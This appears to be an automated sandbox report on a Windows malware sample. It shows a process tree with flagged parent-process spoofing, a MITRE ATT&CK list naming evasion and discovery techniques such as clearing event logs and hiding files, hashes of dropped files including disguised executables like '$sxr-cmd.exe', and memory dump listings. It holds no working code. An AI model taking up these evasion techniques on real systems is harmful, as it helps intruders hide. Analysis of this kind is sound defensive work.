C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1196

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3552

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3896

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2968

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1148

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:832

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5236
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2504 -ip 2504
  2⤵
  PID:5296
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 664 -p 2804 -ip 2804
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5276
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 6060 -ip 6060
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - System Location Discovery: System Language Discovery
  PID:1308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Window

T1564.003

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.15f745ea-299c-4809-9330-d8ecebf4f5da.tmp.txt

Filesize
13KB

MD5
5100664edb873952f210febdc9b061f0

SHA1
9ade4234c3e4b4d34d977ba47ce61696e33576eb

SHA256
9d10ffafefa66265489ffb2bac91b511e60a6344dcb0a60d764617430f663575

SHA512
d88364d452e8f49bde17107d1c7b3b056e92d2c6398b2aacd5dbe37cca966f21d6d255ceffe4190d509a3fed22b4c81ae048d98d6c09958ab980cd64674bef92

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.31f23360-6ef1-4caa-8810-37ca873d5b83.tmp.txt

Filesize
13KB

MD5
a3f78579d0e85640326d3842ac9d0b28

SHA1
f9078ae972ac9b57c4475b604afe2627feb35d85

SHA256
b872d5239f2fc516d13dda7963f6909490ad7bb67a61dd8e4dd3398d76a2bf12

SHA512
c1b00ec809afd3a3e7644b0303b92acf102562444c70ec57069b1c743855835aee04fc352f8eaa5ab059e8170541e5288aa13844464d44f174ffee77c6ea4d46

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4ec0bf67-f5d0-40c1-b1eb-b0262db871e8.tmp.csv

Filesize
39KB

MD5
5c7d4424c0206de538c84512aff4acb8

SHA1
5c999ebbb2c7bb6b6eea1539826c01e97baf0468

SHA256
8b345ec2770271ec8174fb48e089144ef182d7e0163009e8930ad2f53bccd35f

SHA512
d3192d582ad59d25646bc686b28db2a18b514179d8c2c970cca8a17f0bc4f72f2536a7a422c48a9769d630808c34f02c75432cfc0bea5682b877396e12adbb4e

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.8dc8a17a-3e56-4183-9e3e-4c36840b2fd9.tmp.csv

Filesize
40KB

MD5
3c4a1965d4c56cdb2679767b2dc2348c

SHA1
7aaee80698d80220a1200ed29aa358348bee0294

SHA256
9e6bb64cee9826e04d68be5587c5853ea02972685151abf465c7c8e6c133a1c2

SHA512
28c111a484ae656868bf942ef4d5c1079b054814b7f844cfe3dcdc3477cc834865e377421440a81479c25ea96388e736dc0d98fcb3c4e92bf77f541ebe3c836f

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9abea24d-0d76-4344-bf68-bd1d66a7d33e.tmp.csv

Filesize
38KB

MD5
760f33d64a2005296ec2984480f1998a

SHA1
c1b44ba448a5670a26ee2fac984bf8504b47e9f2

SHA256
65b7945fd01e7c92d4eb4a2c1a11e4140dbe4c2db4bb88149e496dd2a8a2aae8

SHA512
a834b6b10ebc5c72e9bc3e217fd24118b20ede3075f1523cc17ff5fcc6c9c9ffa715e0964c2a32a9dc5a7ee001af2e0c692f45c837f7476ffa7235f59dc21a5c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de06e259-7074-4cc8-bc62-70e4c22a68fc.tmp.txt

Filesize
13KB

MD5
4a026e04c2b3faa82a8716ab632035b2

SHA1
125f8ddb7cbe42b5681ea7c2b10ccf60e0ca8458

SHA256
c46d1ff5d3c424fa7dccb7a5751fd9f5c230e0fd336a6cc3a5eea4ccc4f08c0b

SHA512
8e78d984af962f0ea878153af3d2d7796aa5a56d211aecfa15c0eb1f621ac8421228d254e738d4f120f47d6819d4071c8fd8c7a9d0a700e7a58c0aa9ff640a30

Download Submit
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axpmm0rm.tmg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
memory/448-111-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/448-110-0x000001E414B40000-0x000001E414B67000-memory.dmp

Filesize
156KB

Download
memory/552-15-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-33-0x0000020E60B10000-0x0000020E60B1A000-memory.dmp

Filesize
40KB

Download
memory/552-375-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-25-0x0000020E60E10000-0x0000020E61860000-memory.dmp

Filesize
10.3MB

Download
memory/552-27-0x0000020E61860000-0x0000020E61906000-memory.dmp

Filesize
664KB

Download
memory/552-28-0x0000020E61910000-0x0000020E61966000-memory.dmp

Filesize
344KB

Download
memory/552-29-0x0000020E61970000-0x0000020E619C8000-memory.dmp

Filesize
352KB

Download
memory/552-13-0x0000020E608A0000-0x0000020E608C2000-memory.dmp

Filesize
136KB

Download
memory/552-1457-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-30-0x0000020E48550000-0x0000020E48572000-memory.dmp

Filesize
136KB

Download
memory/552-20-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-34-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-14-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-18-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/552-19-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

Filesize
756KB

Download
memory/552-41-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-42-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-17-0x0000020E48520000-0x0000020E48544000-memory.dmp

Filesize
144KB

Download
memory/552-16-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-21-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp

Filesize
8KB

Download
memory/552-31-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/552-22-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-24-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-4-0x00007FFA62A03000-0x00007FFA62A05000-memory.dmp

Filesize
8KB

Download
memory/552-92-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-23-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/552-71-0x00007FFA62A00000-0x00007FFA634C2000-memory.dmp

Filesize
10.8MB

Download
memory/628-127-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/628-126-0x000001F51C730000-0x000001F51C757000-memory.dmp

Filesize
156KB

Download
memory/648-105-0x00000249A1680000-0x00000249A16A7000-memory.dmp

Filesize
156KB

Download
memory/648-113-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/648-104-0x00000249A1650000-0x00000249A1672000-memory.dmp

Filesize
136KB

Download
memory/704-115-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/704-109-0x000001FBD8460000-0x000001FBD8487000-memory.dmp

Filesize
156KB

Download
memory/780-121-0x000001F30C9D0000-0x000001F30C9F7000-memory.dmp

Filesize
156KB

Download
memory/780-122-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/1012-117-0x0000021A78940000-0x0000021A78967000-memory.dmp

Filesize
156KB

Download
memory/1012-118-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/1084-130-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/1084-129-0x000001E20D8B0000-0x000001E20D8D7000-memory.dmp

Filesize
156KB

Download
memory/1092-137-0x0000016EC9740000-0x0000016EC9767000-memory.dmp

Filesize
156KB

Download
memory/1092-138-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/1200-140-0x000001796BE90000-0x000001796BEB7000-memory.dmp

Filesize
156KB

Download
memory/1200-141-0x00007FFA44550000-0x00007FFA44560000-memory.dmp

Filesize
64KB

Download
memory/1528-102-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/1528-100-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/1528-101-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

Filesize
756KB

Download
memory/1528-99-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/1528-98-0x0000000140000000-0x0000000140028000-memory.dmp

Filesize
160KB

Download
memory/1996-38-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/1996-40-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/2656-82-0x00000160677B0000-0x0000016067862000-memory.dmp

Filesize
712KB

Download
memory/2656-69-0x000001606FEF0000-0x000001607032E000-memory.dmp

Filesize
4.2MB

Download
memory/2656-93-0x00000160676F0000-0x000001606772C000-memory.dmp

Filesize
240KB

Download
memory/2656-83-0x0000016067A40000-0x0000016067C02000-memory.dmp

Filesize
1.8MB

Download
memory/2656-95-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/2656-81-0x00000160676A0000-0x00000160676F0000-memory.dmp

Filesize
320KB

Download
memory/2656-73-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/2656-72-0x00000160703E0000-0x0000016070402000-memory.dmp

Filesize
136KB

Download
memory/2656-70-0x0000016070330000-0x00000160703E2000-memory.dmp

Filesize
712KB

Download
memory/2656-94-0x0000016067650000-0x000001606769E000-memory.dmp

Filesize
312KB

Download
memory/2656-68-0x000001606F720000-0x000001606FEEA000-memory.dmp

Filesize
7.8MB

Download
memory/2656-67-0x0000016066CD0000-0x0000016067254000-memory.dmp

Filesize
5.5MB

Download
memory/2656-65-0x00007FFA844C0000-0x00007FFA846C9000-memory.dmp

Filesize
2.0MB

Download
memory/2656-66-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

Filesize
756KB

Download
memory/2656-64-0x000001604E790000-0x000001604E7B4000-memory.dmp

Filesize
144KB

Download
memory/2656-96-0x00007FFA835A0000-0x00007FFA8365D000-memory.dmp

Filesize
756KB

Download
memory/2656-97-0x0000016067730000-0x0000016067766000-memory.dmp

Filesize
216KB

Download
memory/4672-37-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download
memory/4672-35-0x0000000140000000-0x0000000140004000-memory.dmp

Filesize
16KB

Download